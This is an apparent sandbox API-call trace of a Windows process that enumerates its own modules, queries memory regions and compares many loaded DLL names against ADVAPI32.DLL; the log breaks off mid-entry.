0x0 [0209.122] EnumProcessModules (in: hProcess=0xffffffffffffffff, lphModule=0x79b1400, cb=0x1000, lpcbNeeded=0x235f598 | out: lphModule=0x79b1400, lpcbNeeded=0x235f598) returned 1 [0209.132] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff62aec0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff62aec0000, AllocationBase=0x7ff62aec0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.132] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.132] lstrcmpiA (lpString1="msvcrt.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="OLEAUT32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-eventing-provider-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-processthreads-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-debug-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-localization-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-com-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-errorhandling-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-threadpool-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-handle-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-sysinfo-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-synch-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.132] lstrcmpiA (lpString1="api-ms-win-core-registry-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-heap-l2-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-winrt-string-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-heap-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-string-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-eventing-classicprovider-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-processenvironment-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-security-base-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-power-base-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-string-l2-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-path-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-timezone-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-file-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-winrt-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-datetime-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-util-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-memory-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-interlocked-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-rtlsupport-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-profile-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="ntdll.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-job-l2-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-kernel32-private-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-registryuserspecific-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-com-private-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-atoms-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-url-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="KERNEL32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="USER32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="GDI32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="SHCORE.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="SHLWAPI.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="SHELL32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="PROPSYS.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="UxTheme.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="dwmapi.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="TWINAPI.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="combase.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="d3d11.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="dcomp.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-string-l2-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="api-ms-win-core-psapi-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.133] lstrcmpiA (lpString1="SspiCli.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-security-lsalookup-l2-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-core-winrt-error-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-core-registry-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-core-io-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-eventing-controller-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-core-errorhandling-l1-1-3.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="USERENV.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-core-file-l2-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-service-management-l2-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="CRYPT32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-core-delayload-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-core-sidebyside-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-security-lsalookup-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-core-apiquery-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="RPCRT4.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="SLC.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="profapi.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-security-lsalookup-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="netutils.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="wkscli.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-security-sddl-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="CRYPTSP.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="ole32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="CFGMGR32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="WINTRUST.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="Bcp47Langs.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="WINSTA.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="OLEACC.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="DUser.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="DUI70.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="SndVolSSO.DLL", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="WinLangdb.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="MFPlat.DLL", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="MF.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="SETTINGSYNCPOLICY.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="wlanapi.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="AppXAllUserStore.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.134] lstrcmpiA (lpString1="api-ms-win-appmodel-state-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="ext-ms-win-ntuser-draw-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="ext-ms-win-ntuser-draw-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="ext-ms-win-rtcore-ntuser-window-ext-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-winrt-propertysetprivate-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-biptcltapi-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-biptcltapi-l1-1-3.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-biplmapi-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="dsreg.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="ext-ms-onecore-appmodel-veventdispatcher-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="SystemEventsBrokerClient.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-service-management-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-service-winsvc-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="WINMM.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="UIAutomationCore.DLL", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="XmlLite.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977f30000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977f30000, AllocationBase=0x7ff977f30000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.135] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.135] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977ab0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977ab0000, AllocationBase=0x7ff977ab0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.135] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.135] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9753d0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9753d0000, AllocationBase=0x7ff9753d0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.135] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.135] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff973090000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff973090000, AllocationBase=0x7ff973090000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.135] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.135] lstrcmpiA (lpString1="ntdll.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-appcompat-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-handle-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-file-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-processthreads-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-processenvironment-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-errorhandling-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.135] lstrcmpiA (lpString1="api-ms-win-core-sysinfo-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-debug-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-profile-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-eventing-provider-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="KERNEL32.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-localization-obsolete-l1-3-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-localization-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff9773c0000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff9773c0000, AllocationBase=0x7ff9773c0000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.136] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.136] lstrcmpiA (lpString1="ntdll.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-console-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-datetime-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-debug-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-errorhandling-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-fibers-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-file-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-handle-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-heap-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-localization-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-memory-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-namedpipe-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-processenvironment-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-processthreads-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-profile-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-string-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-sysinfo-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-util-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="KERNELBASE.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977760000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977760000, AllocationBase=0x7ff977760000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.136] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.136] lstrcmpiA (lpString1="msvcrt.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="ntdll.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="combase.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-registry-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-com-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.136] lstrcmpiA (lpString1="api-ms-win-core-localization-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-synch-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-string-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-processenvironment-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-processthreads-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-debug-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-file-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-errorhandling-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-memory-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-sysinfo-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-handle-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="RPCRT4.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-localization-l2-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-heap-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-security-base-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-datetime-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-profile-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-kernel32-private-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-localization-private-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="KERNELBASE.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-delayload-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-apiquery-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="ext-ms-win-ole32-oleautomation-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="ext-ms-win-sxs-oleautomation-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] VirtualQueryEx (in: hProcess=0xffffffffffffffff, lpAddress=0x7ff977830000, lpBuffer=0x235f5b0, dwLength=0x30 | out: lpBuffer=0x235f5b0*(BaseAddress=0x7ff977830000, AllocationBase=0x7ff977830000, AllocationProtect=0x80, __alignment1=0xffffe000, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x1000000, __alignment2=0x0)) returned 0x30 [0209.137] NtQueryInformationProcess (in: ProcessHandle=0xffffffffffffffff, ProcessInformationClass=0x0, ProcessInformation=0x235f4e0, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x235f4e0, ReturnLength=0x0) returned 0x0 [0209.137] lstrcmpiA (lpString1="msvcrt.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="RPCRT4.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="ntdll.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-debug-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-errorhandling-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-errorhandling-l1-1-3.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-fibers-l1-1-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-file-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-handle-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-heap-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-heap-l2-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-interlocked-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.137] lstrcmpiA (lpString1="api-ms-win-core-libraryloader-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-localization-l1-2-1.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-memory-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-processenvironment-l1-2-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-processthreads-l1-1-2.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-profile-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-registry-l1-1-0.dll", lpString2="ADVAPI32.DLL") returned 1 [0209.138] lstrcmpiA (lpString1="api-ms-win-core-string-l1-1-0.dll", 